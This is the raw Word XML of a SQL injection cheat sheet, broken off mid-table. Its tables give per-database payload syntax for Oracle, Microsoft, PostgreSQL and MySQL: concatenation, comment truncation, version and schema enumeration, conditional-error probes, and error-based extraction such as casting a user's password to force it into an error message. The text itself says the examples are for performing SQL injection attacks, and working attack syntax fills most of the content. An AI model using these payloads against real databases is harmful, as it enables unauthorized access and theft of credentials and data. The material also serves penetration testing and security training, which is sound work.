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98C02" w14:textId="77777777" w:rsidR="00B8074B" w:rsidRPr="00B8074B" w:rsidRDefault="00B8074B" w:rsidP="00B8074B">
      <w:pPr>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00B8074B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="36"/>
            <w:sz w:val="48"/>
            <w:szCs w:val="48"/>
            <w:u w:val="single"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>SQL injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B8074B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> cheat sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054CE6D9"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This SQL injection cheat sheet contains examples of useful syntax that you can use to perform a variety of tasks that often arise when performing SQL injection attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7240B632"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String concatenation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379A922D"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concatenate together multiple strings to make a single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6811"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="2D9187C1" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FE6A57C"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Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E67576C"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'foo'||'bar'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="432EDB53" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4311AF76"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18850C20"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'foo'+'bar'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="1996C3B8" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77A0E5BA"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729A03F5"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'foo'||'bar'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="39723824" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47DF2B1B"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57858CAA"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'foo' 'bar'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t> [Note the space between the two strings]</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>CONCAT('foo','bar')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DE08382"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Substring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5922088A"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extract part of a string, from a specified offset with a specified length. Note that the offset index is 1-based. Each of the following expressions will return the string </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8074B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ba</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8074B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>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4126"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="45D496E0" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09AE68C8"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Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02F6818C"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SUBSTR('foobar', 4, 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="1F6BDBCE" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07ACE001"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0E1A3B91"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SUBSTRING('foobar', 4, 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="17D661B7" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07DC352C"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25F08977"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SUBSTRING('foobar', 4, 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="32D8CE46" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="166F67E6"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4AF1A1CB"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SUBSTRING('foobar', 4, 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="426E31FD"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Comments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18809998"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use comments to truncate a query and remove the portion of the original query that follows your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6349"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="15330748" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1891182A"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Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1158C2BA"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--comment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="754DBD38" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61AB00FD"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7851CDB6"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--comment</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
              <w:t>/*comment*/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="78B08C48" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42610228"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1E9C9944"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--comment</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
              <w:t>/*comment*/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="623C4D13" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2802AA68"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lastRenderedPageBreak/>
              <w:t>MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09502230"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#comment</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>-- comment</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t> [Note the space after the double dash]</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>/*comment*/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E65B03D"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Database version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E26E1EF"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query the database to determine its type and version. This information is useful when formulating more complicated attacks.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4936"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="2DE170F5" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14B67C7F"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Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37D2D27A"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banner FROM v$version</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
              <w:t>SELECT version FROM v$instance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="3CF36D61" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CB72A4A"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59DE3711"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@@version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="7134F222" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61B7F2C9"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68E9ECF9"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version()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="49DE9B1F" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1739EEDA"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248CD546"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@@version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BF1D30B"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Database contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073A4496"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list the tables that exist in the database, and the columns that those tables contain.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B8074B" w:rsidRPr="00B8074B" w14:paraId="10618E48" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6165DE12"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Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C053F7E"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 FROM all_tables</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
              <w:t>SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="346AB077" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="099C1AE7"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44C0D2FB"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 FROM information_schema.tables</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
              <w:t>SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="4A2073E8" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C00916E"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3CD81EC0"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 FROM information_schema.tables</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
              <w:t>SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="5648DFB2" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A0B620C"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01BD4D3D"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 FROM information_schema.tables</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
              <w:t>SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44BA94E5"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Conditional errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EEEEE1"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test a single boolean condition and trigger a database error if the condition is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B8074B" w:rsidRPr="00B8074B" w14:paraId="3695865A" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D4F17D7"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lastRenderedPageBreak/>
              <w:t>Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E524E5F"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CASE WHEN (YOUR-CONDITION-HERE) THEN TO_CHAR(1/0) ELSE NULL END FROM dual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="7EEA337F" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="214FFDA5"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14C25958"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CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="5122B885" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79C6879E"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504DBB99"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1 = (SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/(SELECT 0) ELSE NULL END)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="51BBF163" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C0D9B49"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710B189B"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IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32283F34"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Extracting data via visible error messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0D785E"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potentially elicit error messages that leak sensitive data returned by your malicious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B8074B" w:rsidRPr="00B8074B" w14:paraId="687FC0AF" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18CF9D1F"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6FCB621C"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'foo' WHERE 1 = (SELECT 'secret')</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
              <w:t>&gt; Conversion failed when converting the varchar value 'secret' to data type int.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="173CC3BD" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="080FE4CD"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64C93D2D"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CAST((SELECT password FROM users LIMIT 1) AS int)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
              <w:t>&gt; invalid input syntax for integer: "secret"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="2BFD286F" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="112DDBB7"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2752BBD9"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'foo' WHERE 1=1 AND EXTRACTVALUE(1, CONCAT(0x5c, (SELECT 'secret')))</w:t>
            </w:r>
